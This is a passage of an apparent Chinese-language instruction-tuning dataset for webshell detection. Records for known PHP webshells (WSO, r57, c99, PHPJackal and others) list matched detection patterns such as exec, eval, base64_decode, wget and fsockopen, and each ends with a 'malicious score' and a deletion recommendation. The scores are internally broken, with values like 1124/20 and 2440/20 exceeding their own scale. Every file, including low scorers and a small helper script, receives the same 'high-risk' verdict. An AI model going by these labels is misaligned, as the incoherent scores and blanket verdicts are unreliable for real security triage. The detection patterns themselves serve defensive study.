1124/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/wso-4.2.5.php", "malicious_score": 1124, "md5_hash": "6056bcc4ac2f6a1a4ade3a44821f1785"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso-4.2.3.php\", \"文件类型\": \"php\", \"文件大小\": \"78095 bytes\", \"行数\": 1623}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1121/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/wso-4.2.3.php", "malicious_score": 1121, "md5_hash": "fdb6145282d7cac82a66ba7fde27f2bf"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso-4.2.1.php\", \"文件类型\": \"php\", \"文件大小\": \"77535 bytes\", \"行数\": 1620}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1121/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/wso-4.2.1.php", "malicious_score": 1121, "md5_hash": "00898cbc3a95544865c6ef3f6dba7506"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso_404.php\", \"文件类型\": \"php\", \"文件大小\": \"107566 bytes\", \"行数\": 2016}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, fwrite(, $_POST[, exec(, system( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 906/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/wso_404.php", "malicious_score": 906, "md5_hash": "57416250665fce5a75cf937662bd0189"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"wso-4.2.4.php\", \"文件类型\": \"php\", \"文件大小\": \"78239 bytes\", \"行数\": 1628}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, $_COOKIE[, fputs( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1124/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/wso-4.2.4.php", "malicious_score": 1124, "md5_hash": "b157382351b17ea3ee889ba29c23555d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"WSO_4_0_5.php\", \"文件类型\": \"php\", \"文件大小\": \"69350 bytes\", \"行数\": 1568}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, file_get_contents(, fwrite(, fputs(, exec( 发现混淆技术: base64_decode, hex2bin, ord\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 822/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/wso/WSO_4_0_5.php", "malicious_score": 822, "md5_hash": "b4d3b9dbdd36cac0eba7a598877b6da1"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SnIpEr_SA Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"103794 bytes\", \"行数\": 2246}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1219/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/SnIpEr_SA Shell/SnIpEr_SA Shell.php", "malicious_score": 1219, "md5_hash": "52c45e73dbe12be56f8826da07011663"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Crystal.php\", \"文件类型\": \"php\", \"文件大小\": \"56135 bytes\", \"行数\": 1127}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, fputs(, exec(, $_POST[ 发现混淆技术: chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 188/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/Crystal/Crystal.php", "malicious_score": 188, "md5_hash": "4d57acd9e25afa0d3d66e8c7f6f5f499"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"zacosmall.php\", \"文件类型\": \"php\", \"文件大小\": \"15878 bytes\", \"行数\": 501}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[, eval( 具备文件操作能力: fopen\\s*\\(, copy\\s*\\(, fwrite\\s*\\( 恶意度评分: 144/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/zacosmall/zacosmall.php", "malicious_score": 144, "md5_hash": "5295ee8dc2f5fd416be442548d68f7a6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ironshell.php\", \"文件类型\": \"php\", \"文件大小\": \"18370 bytes\", \"行数\": 588}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, $_COOKIE[, $_POST[ 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 221/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【ironshell】/ironshell.php", "malicious_score": 221, "md5_hash": "8bfa2eeb8a3ff6afc619258e39fded56"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHPRemoteView.php\", \"文件类型\": \"php\", \"文件大小\": \"88607 bytes\", \"行数\": 2553}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, system(, eval(, base64_decode( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 47/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/PHPRemoteView/PHPRemoteView.php", "malicious_score": 47, "md5_hash": "0b58e6f54ef3861af5de2f064dd4e3f6"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"nstview.php\", \"文件类型\": \"php\", \"文件大小\": \"81159 bytes\", \"行数\": 2136}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_POST[, exec(, eval( 发现混淆技术: base64_decode 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 765/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/nstview/nstview.php", "malicious_score": 765, "md5_hash": "11e8d1100fdb5ea24ed5194af5e3d9fc"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57_kartal.php\", \"文件类型\": \"php\", \"文件大小\": \"98533 bytes\", \"行数\": 1883}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, fputs(, exec(, $_POST[ 发现混淆技术: base64_decode 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1053/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【r57_karta】/r57_kartal.php", "malicious_score": 1053, "md5_hash": "1d912c55b96e2efe8ca873d6040e3b30"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"iMHaPFtp.php\", \"文件类型\": \"php\", \"文件大小\": \"53740 bytes\", \"行数\": 2061}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, $_GET[, fwrite(, exec(, $_POST[ 发现混淆技术: base64_decode, ord\\s*\\( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, mkdir\\s*\\( 恶意度评分: 188/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/iMHaPFtp/iMHaPFtp.php", "malicious_score": 188, "md5_hash": "ab6a7f35be6017af8c8990c01152f1d1"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57.php\", \"文件类型\": \"php\", \"文件大小\": \"108318 bytes\", \"行数\": 2295}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1372/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【r57】/r57.php", "malicious_score": 1372, "md5_hash": "4108f28a9792b50d95f95b9e5314fa1e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"NetworkFileManagerPHP.php\", \"文件类型\": \"php\", \"文件大小\": \"122250 bytes\", \"行数\": 5603}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, system(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 230/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/NetworkFileManagerPHP/NetworkFileManagerPHP.php", "malicious_score": 230, "md5_hash": "c7efba07b27e9b9038c292fcc9a4bf90"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"NIX REMOTE WEB-SHELL.php\", \"文件类型\": \"php\", \"文件大小\": \"53272 bytes\", \"行数\": 1471}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, fputs(, exec( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 458/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.php", "malicious_score": 458, "md5_hash": "f8f5228c29f5a286d6aebe4cadd98ec3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ctt_sh.php\", \"文件类型\": \"php\", \"文件大小\": \"130394 bytes\", \"行数\": 2927}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, exec( 发现混淆技术: base64_decode, ord\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 106/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/ctt_sh/ctt_sh.php", "malicious_score": 106, "md5_hash": "631c125a7d369f2b4b9104d0a444e12d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHP Shell.php\", \"文件类型\": \"php\", \"文件大小\": \"37240 bytes\", \"行数\": 1010}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: passthru(, fwrite(, system(, exec( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 17/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/PHP Shell/PHP Shell.php", "malicious_score": 17, "md5_hash": "a2f8fa4cce578fc9c06f8e674b9e63fd"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99_PSych0.php\", \"文件类型\": \"php\", \"文件大小\": \"164114 bytes\", \"行数\": 3284}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 320/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/c99_PSych0/c99_PSych0.php", "malicious_score": 320, "md5_hash": "32ab6ddc0a2f73789461e2a2390be53e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"EgY_SpIdEr ShElL V2.php\", \"文件类型\": \"php\", \"文件大小\": \"311610 bytes\", \"行数\": 6146}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, base64_decode(, file_get_contents(, $_GET[ 发现混淆技术: ord\\s*\\(, chr\\s*\\(, base64_decode 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 2440/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【EgY_SpIdEr ShElL V2】/EgY_SpIdEr ShElL V2.php", "malicious_score": 2440, "md5_hash": "b55627e68bdb1c744384051010bd68f3"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Shell [ci] .Biz was here.php\", \"文件类型\": \"php\", \"文件大小\": \"161911 bytes\", \"行数\": 3149}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 273/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【Shell [ci] .Biz was here】/Shell [ci] .Biz was here.php", "malicious_score": 273, "md5_hash": "7cfedd3b6049c285df4f4ef211d9a330"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"phpshell3.php\", \"文件类型\": \"php\", \"文件大小\": \"13275 bytes\", \"行数\": 408}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[, $_COOKIE[ 发现混淆技术: chr\\s*\\( 恶意度评分: 44/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【phpshell-2.1】/phpshell3.php", "malicious_score": 44, "md5_hash": "76117b2ee4a7ac06832d50b2d04070b8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pwhash.php\", \"文件类型\": \"php\", \"文件大小\": \"2765 bytes\", \"行数\": 100}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_POST[ 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【phpshell-2.1】/pwhash.php", "malicious_score": 12, "md5_hash": "ba120abac165a5a30044428fac1970d8"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Dx.php\", \"文件类型\": \"php\", \"文件大小\": \"111606 bytes\", \"行数\": 2026}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, copy\\s*\\( 恶意度评分: 1542/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/Dx/Dx.php", "malicious_score": 1542, "md5_hash": "d38dba513196df2d2d5a57a0b27cfd10"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"gfs_sh.php\", \"文件类型\": \"php\", \"文件大小\": \"64548 bytes\", \"行数\": 1575}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, fputs(, exec(, $_POST[, system( 发现混淆技术: base64_decode 包含网络功能: wget, fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 510/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/gfs_sh/gfs_sh.php", "malicious_score": 510, "md5_hash": "3e471100df9c0da9e4ceee81a388c747"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PH Vayv.php\", \"文件类型\": \"php\", \"文件大小\": \"24678 bytes\", \"行数\": 597}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite( 具备文件操作能力: fopen\\s*\\(, unlink\\s*\\(, mkdir\\s*\\( 恶意度评分: 10/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/PH Vayv/PH Vayv.php", "malicious_score": 10, "md5_hash": "ed360ac55c5ac7312a61170e53c6e35d"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHPJackal.php\", \"文件类型\": \"php\", \"文件大小\": \"99189 bytes\", \"行数\": 1582}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, evaL(, fwrite( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 1198/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【PHPJackal】/PHPJackal.php", "malicious_score": 1198, "md5_hash": "e2830d3286001d1455479849aacbbb38"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"smowu.php\", \"文件类型\": \"php\", \"文件大小\": \"44353 bytes\", \"行数\": 7}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: gzinflate(, eval(, base64_decode( 发现混淆技术: base64_decode, gzinflate 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【c99_madnet】/smowu.php", "malicious_score": 13, "md5_hash": "3aaa8cad47055ba53190020311b0fb83"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57shell127.php\", \"文件类型\": \"php\", \"文件大小\": \"108126 bytes\", \"行数\": 2287}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1369/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/r57shell127/r57shell127.php", "malicious_score": 1369, "md5_hash": "41c2362cfb176da0a1a5ae0cc4d685f0"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57shell.php\", \"文件类型\": \"php\", \"文件大小\": \"101469 bytes\", \"行数\": 2187}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1183/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/r57shell/r57shell.php", "malicious_score": 1183, "md5_hash": "ae6b7f612b47529a59a95fc9ac91b550"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99shell.php\", \"文件类型\": \"php\", \"文件大小\": \"141264 bytes\", \"行数\": 2900}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_get_contents(, $_GET[, fwrite(, $_COOKIE[, exec( 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 128/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/c99shell/c99shell.php", "malicious_score": 128, "md5_hash": "5037ab002c7200f8285534ba9310bc84"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57_iFX.php\", \"文件类型\": \"php\", \"文件大小\": \"87741 bytes\", \"行数\": 1917}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, fputs(, exec(, $_POST[ 发现混淆技术: base64_decode, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1058/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【r57_iFX】/r57_iFX.php", "malicious_score": 1058, "md5_hash": "513b7be8bd0595c377283a7c87b44b2e"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r57_Mohajer22.php\", \"文件类型\": \"php\", \"文件大小\": \"114318 bytes\", \"行数\": 2369}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_GET[, fwrite(, $_COOKIE[, fputs(, exec( 发现混淆技术: base64_decode, pack\\s*\\(, chr\\s*\\( 包含网络功能: wget, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, unlink\\s*\\( 恶意度评分: 1258/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【r57_Mohajer22】/r57_Mohajer22.php", "malicious_score": 1258, "md5_hash": "e5b2131dd1db0dbdb43b53c5ce99016a"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99_w4cking.php\", \"文件类型\": \"php\", \"文件大小\": \"143062 bytes\", \"行数\": 2831}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 410/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/c99_w4cking/c99_w4cking.php", "malicious_score": 410, "md5_hash": "9c34adbc8fd8d908cbb341734830f971"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99.php\", \"文件类型\": \"php\", \"文件大小\": \"160677 bytes\", \"行数\": 3069}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: fsockopen 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 260/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/c99/c99.php", "malicious_score": 260, "md5_hash": "61a92ce63369e2fa4919ef0ff7c51167"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Antichat Shell v1.3.php\", \"文件类型\": \"php\", \"文件大小\": \"8996 bytes\", \"行数\": 180}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: fwrite(, $_POST[ 发现混淆技术: ord\\s*\\(, chr\\s*\\( 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\( 恶意度评分: 48/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/Antichat Shell v1.3/Antichat Shell v1.3.php", "malicious_score": 48, "md5_hash": "b3b1e08864b97c18675d60802e2d85b1"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"PHPJackal v1.5.php\", \"文件类型\": \"php\", \"文件大小\": \"86921 bytes\", \"行数\": 1413}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: file_put_contents(, $_REQUEST[, file_get_contents(, evaL(, fwrite( 发现混淆技术: base64_decode, ord\\s*\\(, chr\\s*\\( 包含网络功能: wget, fsockopen, curl_exec 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 988/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": "tennc-webshell/php/PHPshell/【PHPJackal v1.5】/PHPJackal v1.5.php", "malicious_score": 988, "md5_hash": "eee65ab81d2bae76b640acd348f7765b"}} {"instruction": "分析这个php文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"c99_locus7s.php\", \"文件类型\": \"php\", \"文件大小\": \"229103 bytes\", \"行数\": 3595}", "output": "这是一个php类型的webshell文件。 检测到恶意函数: $_REQUEST[, file_get_contents(, $_GET[, fwrite(, $_COOKIE[ 发现混淆技术: base64_decode, ord\\s*\\( 包含网络功能: wget 具备文件操作能力: fopen\\s*\\(, fwrite\\s*\\(, move_uploaded_file 恶意度评分: 491/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_php_detection", "source": "webshell_dataset_tennc-webshell", "metadata": {"file_path": 